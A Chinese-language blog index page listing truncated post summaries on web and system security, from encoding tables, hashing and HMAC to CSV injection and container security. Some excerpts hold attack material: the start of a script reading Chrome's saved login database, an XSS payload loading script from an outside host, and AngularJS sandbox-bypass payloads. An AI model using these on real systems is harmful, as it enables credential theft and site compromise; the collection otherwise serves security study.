摘要:
#coding:utf-8 import os import sys import sqlite3 import win32crypt directory_path = r'Google\Chrome\User Data\Default\Login Data' file_path=os.path.j 阅读全文
摘要:
一、什么是 FreeMarker? FreeMarker 是一款 模板引擎:即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。 它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。 模板编写为FreeMark 阅读全文
摘要:
无防护的XSS测试 <SCRIPT SRC=http://xss.cc/xss.js></SCRIPT> XSS定位器(Polygot) 以下是“ polygot测试XSS有效负载”。该测试将在多个上下文中执行,包括html,脚本字符串,js和url。 javascript:/*--></title 阅读全文
摘要:
AngularJs XSS沙箱绕过payload 1.0.1 - 1.1.5 {{constructor.constructor('alert(1)')()}} 1.2.0 - 1.2.1 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPrope 阅读全文
摘要:
一、实体编码 将不可信数据插入到HTML标签之间时,应对这些数据进行HTML Entity编码,具体编码对照表如下。 显示结果描述实体名称实体编号 空格   < 小于号 < < > 大于号 > > & 和号 & & " 引号 &qu 阅读全文
摘要:
ASCII控制字符 二进制十进制十六进制缩写可以显示的表示法名称/意义 0000 0000 0 00 NUL ␀ 空字符(Null) 0000 0001 1 01 SOH ␁ 标题开始 0000 0010 2 02 STX ␂ 本文开始 0000 0011 3 03 ETX ␃ 本文结束 0000 阅读全文
摘要:
从网站上下载文件时,为了防止文件被篡改,文件作者会附加上文件的哈希值,以便用户把文件下载下来后,通过对比文件哈希值来确认文件是否被篡改。 1、Window的如下命令可以直接计算文件哈希,非常方便。 certutil -hashfile filename MD5 certutil -hashfile 阅读全文
摘要:
一、什么是HMAC HMAC是一种使用单向散列函数来构造消息认证码的方法,其中HMAC中的H就是Hash的意思。 HMAC中所使用的单向散列函数并不仅限于一种,任何高强度的单向散列函数都可以被用于HMAC,如果将来设计出的新的单向散列函数,也同样可以使用。 使用SHA-1、SHA-224、SHA-2 阅读全文
摘要:
“对于网络安全来说,一切的外部输入均是不可信的”。但是CSV文件注入漏洞确时常被疏忽,究其原因,可能是因为我们脑海里的第一印象是把CSV文件当作了普通的文本文件,未能引起警惕。 一、漏洞定义 攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函 阅读全文
摘要:
集群的安全性需要考虑以下几个目标: 1、保证容器与其所在宿主机的隔离 2、限制容器给基础设施及其他容器带来的消极影响的能力 3、最小权限原则——合理限制所有组件的权限,确保组件只执行它被授权的行为 4、明确组件间边界的划分 5、划分普通用户和管理员用户 6、在必要的时候允许将管理员权限赋给普通用户 阅读全文